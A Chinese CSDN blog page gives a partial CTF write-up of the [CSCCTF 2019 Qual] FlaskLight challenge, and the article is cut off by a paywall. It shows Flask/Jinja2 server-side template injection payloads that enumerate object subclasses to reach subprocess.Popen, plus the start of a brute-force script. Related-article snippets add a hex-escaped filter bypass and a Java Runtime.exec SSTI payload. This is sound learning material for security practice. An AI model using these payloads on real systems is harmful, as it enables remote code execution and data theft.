ssti练习之[CSCCTF 2019 Qual]FlaskLight 1

最新推荐文章于 2024-08-29 23:14:22 发布
最新推荐文章于 2024-08-29 23:14:22 发布
阅读量569 收藏 3
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48335916/article/details/112249492
版权
本文介绍了[CSCCTF 2019 Qual]FlaskLight 1挑战的解决过程,通过查看网页源代码发现存在 SSTI 注入。通过特定的 Python 表达式 {{''.class.mro[2].subclasses()}} 暴露了 object 类的子类,并找到 subprocess.Popen。利用这一信息,发现子类 Popen 的索引为258,进一步操作列举目录文件,找到了名为 'coomme_geeeett_youur_flek' 的可疑文件,最终成功读取该文件获取 flag。
摘要由CSDN通过智能技术生成

[CSCCTF 2019 Qual]FlaskLight 1

查看网页源代码,发现里面的提示
在这里插入图片描述
尝试输入url

http://e1f8bf68-fab7-482f-901b-12c336d1cdeb.node3.buuoj.cn/?search={
  {1*9}}

在这里插入图片描述
成功回显,说明存在ssti注入
使用{ {’’.class.mro[2].subclasses()}},可以爆出object类中所有子类,找出subprocess.Popen,copy大佬额exp。

import requests
import re
import html
import time

index = 0
for i in range(170, 1000):
    try:
        url = "http://xxxx/?search={
  {''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"
        r = requests.get(url)
        res = re.findall("<h2>
最低0.47元/天 解锁文章
唯一、、、念你
关注
[CSCCTF 2019 Qual] FlaskLight
汗的博客
08-29 1581
信息收集 index大致就这样,没什么信息 F12看下,发现了线索:search参数 试下ssti 基本就是ssti了 漏洞利用 config 也是 Flask模版中的一个全局对象,它包含了所有应用程序的配置值。 {{ config.items() }} // 查看配置项目的信息 输入:http://xxxxx//?search={{%20config.items()%20}} 爆出一堆信息,这里获得第二个线索,flag在这个目录 You searched for: [('JSON_
CSCCTF-2019-Qual-FlaskLight
Tajang的大千世界
02-09 348
CTF
Flask-WTF
最新发布
Botiway Blog
08-29 807
Flask-WTF是Flask框架的一个扩展,它简化了WTForms(Web表单处理库)在Flask应用中的使用。WTForms本身提供了表单验证和渲染模板的功能,而Flask-WTF在此基础上增加了更多的特性,如CSRF保护、文件上传支持、国际化集成等。
[CSCCTF 2019 Qual]FlaskLight
Sk1y的博客
01-13 295
[CSCCTF 2019 Qual]FlaskLight 文章目录[CSCCTF 2019 Qual]FlaskLight模板注入payload1payload2payload3参考文章 模板注入 搜索,返回查询内容 f12中提示,GET方式传参search可以判断ssti 查看所有子类 ?search={{''.__class__.__mro__[2].__subclasses__()}} 寻找可用子类,这里使用下python脚本来寻找可用类的序号 import requests import re
buuctf pasecactf_2019]flask_ssti
qq_40800734的博客
06-29 2509
1.测试存在ssti 2.获取类型所属的对象,后面显示被过滤了,看了大佬的文章_'.这三个被过滤了,但可以用十六进制绕过 3.寻找基类 4.寻找可用引用 {{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()}} 5.接下来就是开始一系列利用了(基础不是很好,后面的待填坑)一些大佬的方法: 自己的一些总结:使用[]好像可以自动补.号 以下是等价的
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
fenjing工具,ssti
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
[CSCCTF 2019 Qual]FlaskLight SSTI注入
qq_54929891的博客
04-05 2320
进去后页面提示你是flask框架,f12里面告诉你参数名字叫做search并且用GET方法传输,十有八九是模块注入了,用7*7试试服务端模板注入攻击 - 知乎 可以发现在searched后面输出了49,既然我们可以利用{{}},又有输出点,直接模板注入GOGOGO python-flask模块注入(SSTI) - ctrl_TT豆 - 博客园因为不太熟,只能一步步来 ''.__class__ //先随便查看一个字符所属的类是什么 ''.__class__.__mro__ //返回...
bugkuctfweb题解simple_ssti_1
06-28
simple_ssti_1 是一个使用 Flask 框架编写的 web CTF 题目,主要涉及到服务器端模板注入 (Server-Side Template Injection, SSTI) 的问题。 这个题目中,使用者可以在输入框中输入任意字符串,然后后端会将这个字符...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值